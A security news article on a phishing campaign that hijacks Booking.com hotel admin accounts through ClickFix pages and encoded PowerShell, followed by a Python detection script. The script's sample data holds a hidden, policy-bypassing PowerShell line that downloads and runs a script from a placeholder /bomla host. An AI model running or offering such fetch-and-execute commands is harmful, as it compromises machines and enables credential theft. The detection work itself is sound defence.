Cybercriminals Exploit Booking.com Accounts to Target Travelers in Sophisticated Phishing Scheme
A phishing campaign tracked as "I Paid Twice" has been targeting hotels and their guests by taking over hotel administrator accounts on Booking.com. It began in April 2025 and was still active as of October 2025. The operation combines credential theft with multi-stage malware deployment and is a significant risk to the global travel sector.
Attack Methodology
The attack begins with spear-phishing emails sent to hotel administrators. The emails imitate legitimate Booking.com communications and reference real guest reservations and platform activity, which makes them far more credible than generic phishing. Each contains a link that, when clicked, sends the recipient through a chain of redirectors before landing on a page built around the ClickFix social-engineering technique.
Victims who follow the ClickFix instructions run a command themselves, without realising what it does, and that command installs malware on their machine. The malware harvests their professional credentials for booking platforms such as Booking.com and Expedia, which lets the attackers manipulate reservations and extract sensitive guest information.
Commercialization of Stolen Credentials
The stolen credentials are monetized through Russian-speaking cybercrime forums and marketplaces. Compromised Booking.com accounts, especially those managing multiple properties in developed countries, are sold for prices ranging from $5 to $5,000, depending on their activity levels and reservation volumes. This commodification has led to a self-sustaining fraud ecosystem where specialized services handle various stages of the attack chain.
Technical Breakdown of the Infection Mechanism
The infection chain starts with phishing emails sent from previously compromised accounts. The malicious URLs in these emails follow a recognisable pattern, such as hxxps://{randomname}[.]com/[a-z0-9]{4}: a throwaway domain with a four-character alphanumeric path. The landing page runs JavaScript that checks whether it is being displayed inside an iframe before it redirects to the ClickFix page, a check that lets the page serve something other than the redirect to link-preview tools and automated scanners that frame it.
The redirection infrastructure is a commercial Traffic Distribution System (TDS), which keeps the attackers' final infrastructure out of sight of detection and takedown efforts. Each hop preserves URL patterns containing keywords such as admin and extranet (Extranet is the name of Booking.com's partner portal), so the address bar keeps looking legitimate throughout the social-engineering phase.
On the ClickFix page, the victim sees Booking.com branding and a fake reCAPTCHA-style verification that instructs them to copy a command and run it. The command is a PowerShell invocation carrying Base64-encoded instructions, so the victim cannot read what it does before executing it. This first stage downloads secondary scripts from staging URLs whose path ends in /bomla, and those scripts drive the rest of the infection.
The loader collects system information (machine name, current user, Windows version and installed antivirus products) and then downloads a ZIP archive containing an executable and dynamic link library files. Persistence is established through several techniques, including Windows registry modifications and DLL side-loading, in which an executable (typically a legitimate, signed one) is made to load a malicious DLL by its expected name, so the malware is re-launched whenever that executable runs.
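The URL shapes and the Base64-encoded PowerShell stage described above can be turned into a triage check for process-creation logs. The following Python is an added example written for this page, not code from the original article or from the researchers who documented the campaign: it decodes -EncodedCommand payloads the way powershell.exe does (Base64 over UTF-16LE), pulls URLs out of the result, and tags the /bomla staging path and the four-character redirector path. The sample command lines, the host names in them and the stand-in downloader script are constructed for the example; only the two path shapes come from the article, and the redirector check looks at the path alone rather than the .com domain.

```python
"""Triage Windows process-creation command lines for the ClickFix -> /bomla chain.

Added example for this page, not code from the original article. Assumed
indicators: PowerShell -EncodedCommand payloads (Base64 over UTF-16LE, which is
what powershell.exe expects), staging URLs whose path ends in /bomla, and the
hxxps://{randomname}[.]com/[a-z0-9]{4} redirector shape (checked by path only).
"""
import base64
import binascii
import re
from urllib.parse import urlparse

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...),
# so capture every "-e..." switch and decide in code whether it is that switch.
FLAG_RE = re.compile(r"(?<![\w-])-(e[a-z]*)\s+([A-Za-z0-9+/]+={0,2})", re.IGNORECASE)
URL_RE = re.compile(r'''https?://[^\s'"<>()]+''', re.IGNORECASE)
FOUR_CHAR_PATH = re.compile(r"^/[a-z0-9]{4}$")  # the redirector path shape from the article


def encode_command(script: str) -> str:
    """Build the -EncodedCommand form of a script: Base64 of its UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an -EncodedCommand payload, else None."""
    for flag, blob in FLAG_RE.findall(cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue  # -ExecutionPolicy, -ep and similar are not the encoded-command switch
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16le")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64/UTF-16LE; keep looking
    return None


def classify_url(url: str) -> set:
    """Tag a URL with the two indicators the article describes."""
    tags = set()
    path = urlparse(url).path.rstrip("/") or "/"
    if path.lower().endswith("/bomla"):
        tags.add("bomla_staging")
    if FOUR_CHAR_PATH.match(path):
        tags.add("four_char_redirector")
    return tags


def triage(cmdline: str) -> dict:
    """Score one command line: 'high' when encoded PowerShell reaches a /bomla URL."""
    decoded = decode_encoded_command(cmdline)
    # Scan both the raw command line and the decoded script for URLs.
    urls = URL_RE.findall(cmdline + "\n" + (decoded or ""))
    tags = set()
    for url in urls:
        tags |= classify_url(url)
    if decoded is not None:
        tags.add("encoded_command")
    if {"encoded_command", "bomla_staging"} <= tags:
        severity = "high"
    elif tags:
        severity = "medium"
    else:
        severity = "none"
    return {"severity": severity, "tags": sorted(tags), "urls": urls, "decoded": decoded}


# Constructed sample command lines (e.g. Sysmon event 1 / Security 4688 CommandLine fields).
# The host names are placeholders and the Base64 is generated here from a stand-in
# downloader, not from the campaign's real first stage.
STAGE1 = "iex ((New-Object Net.WebClient).DownloadString('https://stage.example.test/bomla'))"
SAMPLE_EVENTS = [
    "powershell.exe -w hidden -ep bypass -enc " + encode_command(STAGE1),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
    "msedge.exe --single-argument https://abcdxyz.example.test/k9q2",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        result = triage(event)
        print(result["severity"], result["tags"], result["urls"])
```

Run as a script, it prints one line per sample event: the encoded downloader scores high, the ordinary scheduled script scores none, and the browser visit to a four-character path scores medium. In a real deployment the input is the CommandLine field of process-creation events; the four-character-path tag on its own is only a hunting lead, since short paths are common, while an encoded PowerShell command that reaches a /bomla URL is worth an immediate escalation.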
Implications for the Hospitality Industry
The campaign shows how attackers are adapting their tactics to the hospitality sector. With a hotel's administrator account, an attacker can manipulate reservations, read sensitive guest information and cause financial losses for both the hotel and its guests.
Recommendations for Mitigation
To protect against such sophisticated phishing attacks, the following measures are recommended:
1. Employee Training: Train staff regularly to recognise phishing, to verify the authenticity of emails that request sensitive information or contain links, and specifically to treat any web page that asks them to copy and run a command as malicious; no legitimate verification step works that way.
2. Multi-Factor Authentication (MFA): Require MFA for all accounts, particularly those with administrative privileges. MFA limits what a stolen password alone is worth, but it does not protect a machine that is already running the attackers' malware, so it complements the other measures rather than replacing them.
3. Regular Security Audits: Conduct periodic reviews of security protocols and access controls to identify and address potential vulnerabilities.
4. Email Filtering Solutions: Deploy advanced email filtering systems to detect and block phishing emails before they reach the inbox.
5. Incident Response Plan: Develop and maintain a comprehensive incident response plan to quickly address and mitigate the effects of a security breach.
By adopting these proactive measures, organizations within the hospitality industry can enhance their defenses against phishing campaigns and protect both their operations and their guests from cyber threats.